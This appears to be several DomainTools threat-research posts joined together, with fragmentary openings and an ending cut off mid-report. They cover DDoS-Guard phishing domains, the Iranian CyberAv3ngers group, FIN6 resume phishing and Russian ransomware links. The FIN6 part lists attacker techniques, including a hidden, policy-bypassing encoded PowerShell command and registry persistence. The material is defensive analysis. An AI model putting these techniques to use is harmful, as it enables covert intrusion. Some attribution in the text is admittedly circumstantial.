This report maps the entire ecosystem of a DPRK IT worker infiltration scheme: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.

This report details an ongoing campaign by an actor operating primarily during Chinese time zone working hours, targeting Chinese-speaking individuals and entities within and outside China. Since approximately June 2023, the actor has created more than 2,800 domains for malware delivery. The actor's methods and malware, largely unchanged since June 2023, primarily deliver Windows-specific malware through fake application download sites and fake update prompts in various spoofed login pages, marketing apps, business sales apps, and cryptocurrency related apps.

🎵 Sometimes you wanna go
Where everybody knows your name
And they're always glad you came 🎵
~Theme from Cheers

Everyone should have a place to go where they’re comfortable, can pull up a comfy infrastructure barstool, and just kick back and enjoy life.

Everyone except malicious actors.

At DomainTools Investigations we take a special interest in the comfort and caretaking of bad actors, wherever it may occur. Whether it’s a den of aspiring hackers stretching their wings, domain registrar business decisions welcoming in Russian disinformation peddlers, or even mapping out ransomware actor musical chairs, you could say we pay keen attention to the care and feeding of predatory ecosystems. 

So it’s no surprise that we’re looking at DNS all the time, day, night and otherwise. Even during leap seconds.

Nameservers and Detecting Threats

They say “to reach people, meet them where they’re at” and in our corporate mission to reach more and more bad actors we’ve taken this to heart. By intensely monitoring nameservers where criminals feel comfortable, we’re able to understand the ebb and flow of whole campaigns as well as opportunistic one-offs as domains circulate between registrars, hosts, and transient infrastructure. 

We turn here to the Russian bulletproof hosting service DDoS-Guard. The name is familiar to most in cybersecurity, with a profile that’s led to the then-Chairwoman of the House Oversight Committee pointing out DDoS-Guard links to the Russian government as well as Brian Krebs laying out the complex web of controversies the hosting company supported at the time, from Hamas to 8chan. 

DDoS-Guard enablement of criminal activity, terrorism, and espionage is not exactly a secret.

Analyzing only a month’s worth of nameserver activity for DDoS-Guard provides an important glimpse into their current corner of the internet. Activity from 2025-05-13 through 2025-06-11 shows thousands of activities, from transfers in and out of the service (illuminating other sources and destinations) to domain creation and deletion. Analyzing this also allows better understanding of where DDoS-Guard sits in the nexus of services used for malicious interests, pointing at large spaces for possible future research.

In isolating domains transferred in and out of DDoS-Guard Nameservers 269 domains were observed being transferred in from other services, 408 domains transferred out from DDoS-Guard to other services, 677 new domains created, and 199 domains deleted. 

For the purposes of this post, we can sort observed domains into three separate buckets, in order of proportion seen: temporary gambling/betting domains, cryptocurrency-targeting domains, and indeterminate/other. The temporary domains were obvious thanks to repetitive, incremented numbers across many alike names as well as their short lifespans on the service: most were new, in non-English languages like Indonesian and Turkish, and deleted within two weeks of creation. A smaller subset was transferred out, mostly to my-ndns[.]com and cloudflare.   

Registrar[.]eu appears in the “transfer out” section as an outlier due to a single cluster of 72 domains either targeting or spamming for Russian gambling website Pokerdom. All examples include landing pages in Russian simulating Pokerdom terms of service or login paths, and all used the TLD top. Historical data shows this cluster was spun up on DDoS-Guard one year previous and transferred out to Registrar[.]eu instead of being renewed. 

Observing nameservers, as noted, also allowed us to see where DDoS-Guard lies in relation to bad actors constantly shopping their domains from service to service to try and avoid detection or blocklisting. Several notable examples came up in research.

Bioservamerica[.]com sounds like a perfectly reasonable domain from afar. However, seeing it become newly active after three years of dormancy and then bouncing between DDoS-Guard and Cloudflare caused us to take a closer look. In fact, bioservamerica[.]com is the domain for an Indonesian gambling website utilizing the age of the domain to evade some risk metrics.

An investigative rabbit hole deepened the more we dug. Bioservamerica[.]com redirected to capecodrestaurantweek[.]com; sharing that redirect was restaurantweekcapecod[.]com. A pivot on the registrant for the latter led to a dozen chef- or restaurant-themed websites that appear to serve as redirects for a massive network either supporting black-market gambling sites or attempting to phish those users. Passive DNS revealed suspiciously rapid and ongoing DNS changes suggestive of fast flux or a similar technique for capecodrestaurantweek[.]com. All told, this network appeared to be acquiring aged domains and utilizing sophisticated obfuscation and redirection techniques and is due for further research.

Another elementary finding while observing DDoS-Guard nameservers involves a campaign targeting holders of Vanilla gift cards, a Visa product. DDos-Guard users are fans of “com” domains - beginning with apex domains containing “com” to utilize targeted subdomains and deceive targets about the actual site. In practice, the domain comtrackmycom[.]com utilizes subdomains like “www.vanillagift,” so the user sees www.vanillagift[.]comtrackmycom[.]com. In many situations, our perception blocks out everything after the first “com” so that the URL seems legitimate. This domain spun up on DDoS-Guard on 2025-06-02 and, while blocklisted, still appears to be active. 

Digital Assets

A popular target for DDoS-Guard users is players of the popular first-person shooter game CounterStrike: GO. CounterStrike has a long history of strangeness around its weapon skin system, which allows users to apply custom decorative designs to their in-game weapons rated by the rarity in which they emerge from game loot boxes (“cases”). Game company Valve halted the entire system in 2019 for a redesign after discovering nearly all transactions were involved in money laundering. DDoS-Guard nameservers reveal a number of candidates for investigation:

Csmoney[.]to, created on DDoS-Guard on 2025-05-28 is likely impersonating the trading marketplace cs[.]money for phishing purposes. 

The domain hellcase[.]com appears to be a legitimate site surrounding case-opening and exclusive skins. However, on DDoS-Guard we see at least one actor deeply comfortable with the service, spinning up over a dozen new domains targeting CS:GO and Hellcase users, as well as transferring domains in and out. Despite being less than a month old at the time of writing, the below domains all show as having already been added to third-party blocklists:

Cs2-hellcas[.]com
Hell2cs[.]com 
Hellcs2-events[.]com
Hellcs2promo[.]com
Hellcspromo[.]com
Hlcase-event[.]com
Hlcases-events[.]com 
Hlcases-promotional[.]com
Hlcs-promo[.]com
Hlcs-promotionals[.]com

Highlighting the traffic flows in and out of DDoS-Guard nameservers, we can observe hlcases-events[.]com transferred out to Cloudflare, and cs2-hellcas[.]com transferred in from 1reg[.]buzz. The actor(s) targeting CS:GO and Hellcase users seemed mostly comfortable with DDoS-Guard during the month of observation, but this kind of activity raises a question for further research about fingerprinting risk by measuring nameserver transitions.

Cryptocurrency

Video game weapon skins aren’t the only digital asset being targeted from Russia. DDoS-Guard nameserver activity provided a wealth of information on scams and phishing targeting cryptocurrency users. In one month, domains were observed aimed at the following protocols and platforms: Atomic, Bluefish, Brex, Coinbase, Cortex, DefiSaver, Dragonswap, Felix, Hybridge, Hyperion, Hyperlend, Hyperswap, Ledger, Mercury, MetaMask, Nexus, Odos, SoSoValue, Trezor, Tron, UsualMoney, and YieldNest. 

Pivots on those domains provided insight into additional apex-level domains or subdomains targeting DEXscreenr, MyEtherWallet, Phantom, Phala, Rabby, Rainbow, Rarible, Safepal, Sui, Trust, Uniswap, and more.

That’s quite the list for one month’s worth of watching, it feels like.

Patterns emerged in several cases of domains created on DDoS-Guard and either deleted within days or transferred out to another set of nameservers within a week. 

Let’s discuss some example findings.  

YieldNest[.]finance is a restaking token aiming to increase earnings through advancing liquidity in the Ethereum ecosystem. Yet someone’s also looking to restake a claim:

‍

Despite all of these domains being up for less than a week, they all showed a connection to infrastructure, passive DNS indicated resolutions in the wild, and they all substantially diverged from YieldNest’s primary domain profile. IP address, MX record, and tracker pivots on these five domains surfaced several more targeting YieldNest, as well as domains targeting Coinbase, the Oasis protocol, payment processor Coinwall, PLANET token, and more. While PDR and Reg[.]ru were observed, behavior indicated an overwhelming preference for DDoS-Guard, as well as a strong preference for the use of Cloudflare and Namecheap. Many of these domains show abnormal daily changes to either MX or NS records during their period of activity.

While more research is necessary over a longer term to validate it, monitoring problematic nameservers shows promise as a traffic supernode to establish behavior patterns that can support more complex and targeted observation and detection of malicious actors. 

Another great example is several domains targeting the Ledger wallet and app. En-ledger[.]to was created on DDoS-Guard services on 2025-05-27 and provided an excellent IP address pivot to 70+ domains almost exclusively targeting cryptocurrency wallets like Atomic, MetaMask, MyEtherWallet, Trezor, and Trust (among others). Most are currently blocklisted with an astronomically high average third-party risk score.

Common infrastructure characteristics across the cluster:

Another popular target in this brief glimpse into DDoS-Guard was cross-chain swap Hybridge. Cross-chain bridges and swaps allow users to exchange tokens from one chain with tokens from a different chain, and in practice they hold a sizable amount of cryptocurrency in hot storage for this purpose, making them a juicy prize. 

App-hybridge[.]finance was created on DDoS-Guard on 2025-05-09, transferred to registrar[.]eu nameservers on 2025-05-30, and back to DDoS-Guard on 2025-05-31. A screenshot from urlscan[.]io of the landing page on 2025-05-26 shows an emulated login page.

It should be noted that no results either in the documentation of Hybridge nor on their social media indicate a domain of anything other than hybridge[.]xyz, so both hybridge[.]finance and app-hybridge[.]finance appear to be malicious; both connected to DDoS-Guard, with hybridge[.]finance transferring out to regery[.]net on 2025-05-27 and app-hybridge[.]finance transferring out and back in as noted above. 

Conclusion

Above we’ve discussed the results of observing nameservers for Russian bulletproof host DDoS-Guard for a single month, 2025-05-13 through 2025-06-11. Results showed a vast array of threats, but the most active targeted the cryptocurrency sphere in very specific ways, especially through emulating wallets, exchanges, and cross-chain swaps. 

There is more work to do and more bad actors, like DDoS-Guard, that provide a haven for criminal activity. Utilizing DNS and domain intelligence, as well as nameserver surveillance over an extended period of time, gives us a feel for the traffic flows of domain services, watching likely or proven malicious domains spin up, get deleted, and transfer in and out. 

Digital assets, cryptocurrency, and other decentralized finance services should ensure that they monitor not just new or newly active domains and subdomains but also identify those service providers that give comfort to scammers, phishers, and others. This allows those services a much more clear day-to-day understanding of the prolific and varied threat environment they face, informing both the ways they protect their infrastructure and how they can educate users to protect themselves.

Cryptocurrency and decentralized finance users can protect themselves by staying informed of the threats the sector faces and staying current on the news, as well as engaging with protective DNS solutions and other blocklists that not only use third-party data but allow the user to input domains, services, and other characteristics into their blocklist. The simple act of blocking any domain with ddos-guard[.]net nameservers may serve to cut dozens or hundreds of direct threats per month.

More research along these lines is forthcoming from DomainTools Investigations.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Intelligence Group 13, embedded within the Shahid Kaveh Cyber Group, represents one of the most operationally aggressive and ideologically fortified units within the Islamic Revolutionary Guard Corps (IRGC) cyber arsenal. Positioned at the confluence of tactical cyber-espionage, industrial sabotage, and psychological warfare, the group is uniquely equipped to respond to geopolitical escalations,particularly in light of the recent U.S. airstrikes targeting Iranian nuclear facilities, which have significantly heightened the risk of asymmetric retaliation.

As the conflict between Iran and Israel escalated in early 2025, it quickly expanded beyond missiles and airstrikes into a broader battle for digital and psychological dominance. Among the most visible players in this new front is a group known as CyberAv3ngers. Their operations have included hijacking water systems, defacing programmable logic controllers (PLCs), and ridiculing Israeli cybersecurity efforts across social media platforms like Telegram and Twitter. Yet, their rise wasn’t built solely on technical exploits—it began with fabrications and theatrical messaging. CyberAv3ngers evolved from obscure defacers into sophisticated narrative operators, blending cyber sabotage with psychological operations. As their influence grew, so did suspicions of deeper affiliations—particularly with Iran’s Cyber Command, suggesting that the group may be more than a rogue actor and instead part of a broader state-aligned strategy.

Act I: A Hot War Fuels a Digital One

The ongoing conflict between Iran and Israel has intensified across both physical and digital fronts. In the last two weeks alone, Iran has launched multi-warhead missile attacks targeting major Israeli cities such as Tel Aviv and Haifa. In response, Israel conducted retaliatory airstrikes against Iranian military installations, nuclear sites, and key IRGC-Cyber Electronic Command (IRGC-CEC) facilities in cities like Isfahan and Tehran. Alongside these kinetic exchanges, Iranian cyber operators have reportedly hijacked Israeli CCTV and smart home cameras to evaluate the precision and impact of missile strikes in real time. Concurrently, cyberattack activity has spiked dramatically, since early June affecting sectors ranging from energy and defense to agriculture and municipal infrastructure across Israel and extending into Western targets.

Act II: Who Are CyberAv3ngers?

Before CyberAv3ngers emerged as a recognizable threat actor in 2023, they appeared to be reviving an obscure alias from the past. In 2020, a group calling itself “Cyber Avengers” claimed responsibility for a power outage and railway disruption in Israel, events that Israeli officials attributed to technical faults, not cyberattacks. No malware was identified, no indicators of compromise (IOCs) were released, and the group faded from view. Then, in September 2023, a new Telegram channel @CyberAveng3rs was launched, adopting the old name with a stylized twist and retroactively tying itself to the 2020 claims. The group posted ideological threats, listed infrastructure targets, and positioned itself as a cyber-arm of resistance. Its first major public claim came on October 8, 2023, when it announced it had hacked the Dorad power station, one of Israel’s largest private energy producers, a dramatic move intended to cement its arrival in the cyber threat landscape.

Except they didn’t hack it.

CyberAv3ngers' claim that they hacked Israel’s Dorad private power station on October 8, 2023, was quickly debunked by technical analysis. Investigators from Securelist confirmed that the images shared by the group were not the result of a new intrusion but were recycled from a 2022 data leak by the Iranian APT group Moses Staff. The visuals had been cropped, overlaid with new logos, and presented as fresh evidence, but metadata and compression timestamps matched the original files. There was no supporting technical evidence—no new malware, logs, or IOCs to indicate that CyberAv3ngers had gained real access to Dorad’s infrastructure. The only actual activity was a denial-of-service (DDoS) attack on the Dorad website, which served more as a psychological support act than an operational exploit. This episode marked a clear shift in CyberAv3ngers' strategy: from technical sabotage to theatrical propaganda.

Act III: The Illusion of the Dorad Hack

In reality, CyberAv3ngers did not breach the Dorad power station in October 2023. Instead, they repurposed images from a 2022 leak by the Iranian APT group Moses Staff. These files, though legitimate at the time of their original release, were outdated. CyberAv3ngers cropped the images, added their own defacement slogans, and circulated them as if they were proof of a new, live intrusion. No technical compromise occurred at Dorad, but the impact was psychological. The staged attack triggered a wave of reactions across social media and threat monitoring communities. Telegram lit up with reposts, and news outlets picked up the story. To reinforce the illusion, CyberAv3ngers launched DDoS attacks on Israeli websites and released altered versions of Israeli infrastructure security guidance under mocking titles like “Advice for Victims.” It was a performance—but one calibrated to sow fear and disrupt public trust.

Act IV: When the Hacks Became Real

While some of CyberAv3ngers’ early claims were rooted in propaganda, the group did carry out real and damaging cyberattacks. Between November 2023 and April 2024, at least 29 confirmed intrusions targeting industrial control systems (ICS) and operational technology (OT) in the United States were attributed to the group. Among these incidents were compromises of Unitronics PLCs used in municipal water utilities, including one in Aliquippa, Pennsylvania, where human-machine interfaces (HMIs) were defaced with the message: “You have been hacked, down with Israel.” The group also targeted fuel distribution systems, specifically Orpak and Gasboy terminals, disrupting their functionality. Additional intrusions affected routers, IP cameras, firewalls, and HMIs across various sectors of critical infrastructure. At the center of these campaigns was a custom Linux-based malware tool known as IOCONTROL, which enabled persistent access, remote command execution, and stealthy communication via encrypted MQTT channels. These attacks confirmed that beneath the narrative manipulation, CyberAv3ngers had a genuine operational capability with real-world consequences.

Act V: Iran’s Cyber Doctrine Evolves

CyberAv3ngers represents the latest evolution in Iran’s long-standing tradition of blending cyber operations with ideological messaging. While groups like Moses Staff, APT33, and Charming Kitten have previously combined technical intrusions with media theatrics, CyberAv3ngers has refined the model into a fully realized propaganda apparatus. Their approach is not just to breach systems, but to control the narrative surrounding those breaches—turning each operation into a performance aimed at both foreign audiences and domestic sympathizers. What sets them apart is the deliberate construction of a digital persona that fuses propaganda, defacement, and symbolic domain control into a cohesive identity.

Further supporting this narrative-centric shift, we observed three domains registered within hours of CyberAv3ngers’ September 15, 2023 Telegram launch post—a message that introduced the group’s rebranding and outlined threats to Israeli infrastructure. The domains were:

• cyberav3ngers.com
  
• cyberav3ngers.org
  
• cyberav3ngers.net

All three were registered through Namecheap using the registrar service registrar-servers.com, with privacy masking enabled via WithheldForPrivacy. As of this writing, none of the domains host active websites, nor do they resolve to public content. Passive DNS history shows that these domains were connected briefly to placeholder IP addresses, but no C2 or content delivery infrastructure has been deployed—strongly suggesting that their primary function is symbolic rather than operational.

This domain registration pattern aligns tightly with CyberAv3ngers’ pivot to psychological operations. Rather than functioning as delivery vehicles for malware or command-and-control beacons, these domains appear to serve as digital flags staking ideological territory on the internet. Just as their defacements aim to instill fear and assert presence, these unused domains enhance the group’s narrative power, presenting them as structured, intentional, and enduring. By echoing the group's name in global domain registries, CyberAv3ngers reinforces its persona as a persistent ideological combatant—building credibility not just through code, but through semiotic control.

CyberAv3ngers’ propaganda and PSYOPS narrative strategy:

• Builds on past Iranian hybrid groups like Moses Staff, APT33, and Charming Kitten, known for blending cyberattacks with ideological content.
  
• Operates a Telegram channel not just for updates, but as a staged information environment—complete with threats, slogans, and memes.
  
• Frequently shares repackaged defacements and screenshots to simulate recent operations.
  
• Registers domain names, to establish symbolic control and brand presence (e.g., cyberav3ngers.com, cyberav3ngers.org, cyberav3ngers.net).
  
• Continues the Iranian model of patriotic hacker narratives, but with diminished separation between state and grassroots actors.
  
• Leverages these platforms to mock foreign security services, distribute edited guidance docs, and amplify the psychological effect of their campaigns.
  

Act VI: Who’s Behind the Mask?

The U.S. government has made no secret of its belief that Iran’s IRGC-Cyber Electronic Command (IRGC-CEC) is behind the escalating cyber campaigns targeting U.S. and Israeli infrastructure. In 2024 and early 2025, the U.S. Treasury and Department of Justice sanctioned six IRGC-CEC operatives, naming them as key players in attacks against critical systems. All six were added to the Rewards for Justice program, with bounties of up to $10 million for information leading to their arrest. Among the most prominent is Mahdi Lashgarian, a senior cyber operations official and likely architect behind multiple OT-focused malware campaigns. While public attribution has yet to confirm a direct link between Homayunfal and the alias Mr. Sul (or Mr. Soul), mounting circumstantial evidence places him squarely in the operational core of the CyberAv3ngers campaign.

Now, he’s also become a target.

In May 2025, an Israeli patriotic hacker group calling itself WeRedEvilsOG claimed on Telegram that they had successfully breached Lashgarian’s personal and professional accounts. The group released what it described as a “partial dox drop”, including purported email addresses, internal communications, and IRGC-linked credentials. While the authenticity of the data is still under review, the leak marked the first instance of direct retaliatory targeting against a named Iranian cyber commander involved in the ICS/OT threat landscape.

Profile: Mahdi Lashgarian

• Full Name: Mahdi (Mehdi) Lashgarian
  
• Date of Birth: June 2, 1989
  
• Nationality: Iranian
  
• Affiliation: Senior official in the Islamic Revolutionary Guard Corps – Cyber‑Electronic Command (IRGC‑CEC)
  

Why he’s suspected to be “Mr. Sul”

• Matches the technical and leadership profile attributed to the IOCONTROL malware operator
  
• Named in the same DOJ bounty notice targeting CyberAv3ngers operators
  
• His sanction timeline aligns with the rollout of the most destructive CyberAv3ngers campaigns
  
• Newly leaked data by WeRedEvilsOG reportedly ties him to multiple IRGC infrastructure assets

The inclusion of Lashgarian in public sanctions, U.S. bounty programs, and now retaliatory hacker operations by pro-Israel actors suggests that the shadow war between Iran and Israel has entered a new phase—one where attribution isn’t just technical, it’s personal.

Final Act: A War of Machines and Messages

CyberAv3ngers has evolved beyond a conventional threat actor into a strategic asset within Iran’s asymmetric warfare toolkit—combining real-world cyberattacks, recycled leaks, and targeted propaganda to amplify psychological impact. Their operations integrate technical capability, such as IOCONTROL malware and MQTT-based command and control, with ideological messaging distributed via Telegram, Twitter, and symbolic domain registrations. Whether or not “Mr. Sul” is truly Mahdi Lashgarian, the persona functions as a force multiplier shaping narratives, intimidating adversaries, and reinforcing the perception of persistent threat. CyberAv3ngers aren't just breaching systems, they're engineering beliefs.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

FIN6 and Financially Motivated Cybercrime

Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations.

In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment.

This research combines technical insights and practical analysis for both general audiences and cybersecurity professionals. We examine how FIN6 uses trusted cloud services, such as AWS, to host malicious infrastructure, evade detection, and ultimately deploy malware through socially engineered lures.

Phishing with Fake Resumes

FIN6 begins its attack by crafting phishing emails that impersonate job applicants. But their social engineering doesn't start in the inbox. The group has been observed initiating contact via professional job platforms like LinkedIn and Indeed, posing as enthusiastic job seekers and engaging with recruiters before following up with phishing messages. This adds a layer of authenticity and increases the chances of the recruiter trusting the source.

This phishing lure shows a professionally worded message from a fake applicant, using a non-clickable, no hyperlink ('bobbyweisman[.]com') to bypass automated link detection. This tactic forces the recipient to manually type the URL into their browser.

These messages are carefully written and contain no clickable links—an evasion technique that helps them bypass security filters. Instead, recipients are forced to manually type a URL, often obscured with added spaces, or underscores “_” such as (elizabethabarton. COM)

Notably, the domains used in these campaigns often follow a pattern where the attacker's domain mimics a real applicant by combining a first and last name (e.g., bobbyweisman[.]com, ryanberardi[.]com). These domains are typically registered anonymously through GoDaddy, adding a layer of obfuscation that complicates threat attribution and takedown efforts. By exploiting GoDaddy’s domain privacy services, FIN6 further shields the true registrant details from public view and takedown teams. Although GoDaddy is a reputable and widely used domain registrar, its built-in privacy features make it easy for threat actors to hide their identities.

Whois records for these domains typically show redacted ownership information and standardized proxy entries, often pointing to GoDaddy’s domain privacy service. Abuse reports can technically be submitted via contact email fields listed in the Whois, commonly abuse@godaddy.com; however, responses and enforcement timelines vary.

It is likely the actors behind these domains use disposable or fraudulent email addresses, anonymous or foreign IP addresses, and prepaid or stolen payment methods to create and maintain these accounts. Combined with the use of resume-themed domain names and impersonation techniques, this registration strategy allows FIN6 to keep their infrastructure alive just long enough to carry out active phishing campaigns while avoiding rapid takedown by security researchers or registrars.

Cloud-Hosted Malware Infrastructure

FIN6 hosts its phishing sites using trusted cloud infrastructure, including AWS. These platforms are appealing to attackers due to:

• Past observations of FIN6 leveraging Amazon CloudFront to obscure infrastructure and evade detection. By using CDN services like CloudFront, attackers can mask the origin of malicious content, making it harder for defenders to trace and block the true hosting source.
• Ease of setup using services like EC2 and S3
  
• Low cost with free-tier abuse or use of compromised billing accounts
  
• Cloud IP ranges that are often implicitly trusted by enterprise network filters
  
• Built-in scalability and the ability to rapidly provision disposable infrastructure

FIN6 often sets up landing pages on cloud-hosted domains that resemble personal resume portfolios. These domains are usually mapped to AWS EC2 instances or S3-hosted static sites, making them difficult to distinguish from legitimate personal or business hosting.

These landing sites are built with traffic filtering logic to distinguish between potential victims and unwanted analysis tools. If the visitor doesn't match specific criteria, the site serves only benign content, typically a plain-text version of the resume or an error page.

To evade detection and analysis, FIN6 deploys a combination of environmental fingerprinting and behavioral checks, including:

• IP reputation and geolocation – Traffic is filtered to allow access only from residential ISP ranges, excluding connections from cloud infrastructure, VPN services, or known threat intelligence networks.
• Operating system and browser fingerprinting – The site checks for typical Windows browser user-agent strings, such as Mozilla/5.0 (Windows NT 10.0; Win64; x64). Visitors using Linux, macOS, or uncommon browsers are blocked or shown harmless content.
• CAPTCHA verification techniques – The site presents a CAPTCHA (such as Google reCAPTCHA) that must be completed before allowing access to any downloadable content. This prevents automated analysis tools and headless browsers from easily interacting with the site. In many cases, the CAPTCHA is only triggered when the visitor meets initial filtering conditions, acting as a final gate to ensure human presence before delivering the payload.

These layered filters ensure that the malicious content is only delivered to actual human recruiters browsing from typical home or office setups, while blocking security scanners and automated crawlers.

If the request meets all conditions, the site returns a CAPTCHA and a fake resume interface that eventually offers a ZIP download. 

All the following domains have been confirmed as hosted on AWS infrastructure:

• bobbyweisman[.]com
• emersonkelly[.]com
• davidlesnick[.]com
• kimberlykamara[.]com
• annalanyi[.]com
• bobbybradley[.]net
• malenebutler[.]com
• lorinash[.]com
• alanpower[.]net
• edwarddhall[.]com

These sites often display a professional-looking fake resume, complete with a CAPTCHA to verify human access. Additionally, the attackers employ traffic filtering techniques to control who can access the malicious content. Only users appearing to be on residential IP addresses and using common Windows-based browsers are allowed to download the malicious document. If the visitor originates from a known VPN service, cloud infrastructure like AWS, or corporate security scanners, the site instead delivers a harmless plain-text version of the resume. This selective delivery tactic helps the malware infrastructure avoid detection and analysis. If conditions are met, the site delivers a malicious ZIP file to the visitor.

More_eggs Malware Delivery Chain

The malware delivery uses simple techniques wrapped in deceptive visuals:

• ZIP file contains a disguised .LNK (Windows shortcut) file
  
• LNK file executes hidden JavaScript using wscript.exe
  
• Payload connects to external resources and downloads the More_eggs backdoor

More_eggs, developed by the "Venom Spider," also known as "Golden Chickens," is a modular JavaScript backdoor offered as malware-as-a-service. It allows for command execution, credential theft, and follow-on payload delivery, often operating in memory to evade detection.

Common TTPs Observed:

• Initial Access: .zip archive containing .lnk file
• Execution: Uses LOLBins like ie4uinit.exe, regsvr32.exe, or msxsl.exe
  
• Persistence: Registry run keys or scheduled tasks
  
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<RandomName>
    
• C2 Communication: HTTPS with spoofed User-Agent headers
  
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    
• PowerShell Execution:
  
  • powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <Base64>

How to Defend Against These Attacks

For Recruiters and General Staff:

• Avoid manually typing in resume links from unknown senders
  
• Be cautious of CAPTCHA-protected resume sites
  
• Never download ZIP files unless verified by IT

For Security Teams:

• Monitor for outbound traffic to domains that appear recently re-registered or show signs of ownership change. These domains may have been benign in the past and are now being used for malicious purposes. This reuse can help attackers benefit from existing domain reputation and bypass domain age-based filters.
  
• Block execution of .lnk files inside ZIPs from untrusted sources
  
• Detect use of LOLBins executing PowerShell or JScript unexpectedly
  
• Implement EDR policies for scripting engine abuse (e.g., wscript.exe, msxsl.exe)
  
• Watch for persistence indicators in Windows registry and scheduled tasks

The Efficacy of Low-Complexity Phishing Campaigns

FIN6’s Skeleton Spider campaign shows how effective low-complexity phishing campaigns can be when paired with cloud infrastructure and advanced evasion. By using realistic job lures, bypassing scanners, and hiding malware behind CAPTCHA walls, they stay ahead of many detection tools.

Security teams and HR departments alike must stay informed and vigilant. Training, layered defenses, and early detection of unusual traffic or file types are critical to disrupting these types of attacks.

Stay informed. Stay alert. Stay safe.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/Skeleton-Spider-Trusted-Cloud-Malware-Delivery.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Understanding the landscape of cyber threats, particularly Russian-affiliated ransomware, is a complex and evolving challenge. The traditional model of tracking distinct, unified ransomware groups is becoming increasingly difficult. In the "post-Conti era," ransomware has transformed into a marketplace of mutations. It's no longer about centralized operations but rather a fractured ecosystem where allegiances shift and connections are often hidden.

In order to develop a deeper understanding and help others in the community in the process, Jon DiMaggio at Analyst1, Scylla Intel, and the DomainTools Investigations Team dove into a research project that culminated into a detailed infographic called “A Visual and Analytical Map of Russian-affiliated Ransomware Groups.” This work follows previous research DomainTools undertook in tracking ransomware families and provides a visual representation of complex connections in this space.

The goal of this project was not simply attribution or listing individual groups. Instead, we set out to map hidden connections between criminal factions, going beyond just mapping "families" to understand the intricate relationships between them. The core focus was on identifying overlaps in human operators, code fragments, infrastructure, and TTPs (Tactics, Techniques, and Procedures). 

The Creation Process: A "Spider-Out" Investigation

Creating this map required a deep dive into the operational realities of various ransomware actors. Our methodology involved performing a "spider-out" incremental investigation. We began with well-known groups like Conti, LockBit, and Evil Corp, then expanded our research outwards, following the threads of connection.

To gather the necessary information, we drew upon a variety of sources:

• OSINT (Open-Source Intelligence)
• Historic infrastructure data
• Proprietary threat intelligence
• HUMINT (Human Intelligence) 

It's important to note that the analysis only includes publicly available information; nothing is revealed that could tip off adversaries.

Our analysis of these diverse data points helped isolate valuable signals from the surrounding noise. This included overlapping IP addresses, passive DNS records, shared certificates, web content, and delivery vectors used by different groups. These infrastructure overlaps imply potential resource pooling, bulletproof hosting, or affiliate-level reuse. We also analyzed code and TTP crossovers, such as the overlap between Black Basta and Qakbot or the use of legacy Trickbot infrastructure. The prevalence of shared tools like AnyDesk and Quick Assist also suggested common training, playbooks, or crossovers in operator organizations. And finally, we looked closely at the most important element, the people in these groups.

Visualizing the Overlaps: Human Capital and Operator Drift

Perhaps one of the most significant findings visualized in the infographic is the human overlap and operator drift. Our research uncovered instances of known individual actors migrating across different ransomware ecosystems. For example, sources indicate individuals like “Wazawaka” have been associated with multiple groups including REvil, Babuk, LockBit, Hive, and Conti. Similarly, "Bassterlord" moved from REvil to Avaddon, then to LockBit, and finally to Hive.

This phenomenon highlights a crucial insight: brand allegiance among these operators is weak, and human capital appears to be the primary asset, rather than specific malware strains. Operators adapt to market conditions, reorganize in response to takedowns, and trust relationships are critical. These individuals will choose to work with people they know regardless of the name of the organization. Indeed, rebranding in this context is a feature, not a bug. The infographic helps to visualize how these individuals move between groups, carrying their expertise and capabilities with them.

Key Takeaways from the Mapping:

The creation of this infographic reinforces several strategic takeaways:

• Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
• Group labeling is increasingly obsolete.
• The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

This new perspective, visually represented in this infographic, is crucial for understanding how ransomware operations function today. Groups act like modules, specializing and adapting as the marketplace matures. They exhibit a separation of responsibilities, with distinct roles for negotiators, developers, infrastructure managers, and leadership. Sanctions evasion strategies, such as Evil Corp’s repeated rebranding paired with infrastructure reuse, prove that while names may change, capabilities endure.

Understanding these hidden alliances and overlaps is key to developing and maturing more effective disruption strategies. As a community, we need to evolve how we track actors and criminal brands, recognizing that shared infrastructure or website artifacts might serve as more stable "fingerprints" than group names.

The full infographic provides a comprehensive visual guide to these complex relationships. We believe this work offers a new lens through which to view and counter Russian-affiliated ransomware, emphasizing the need to understand the underlying ecosystem and human networks rather than just transient names and tools.

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader Powershell Scripts Identified

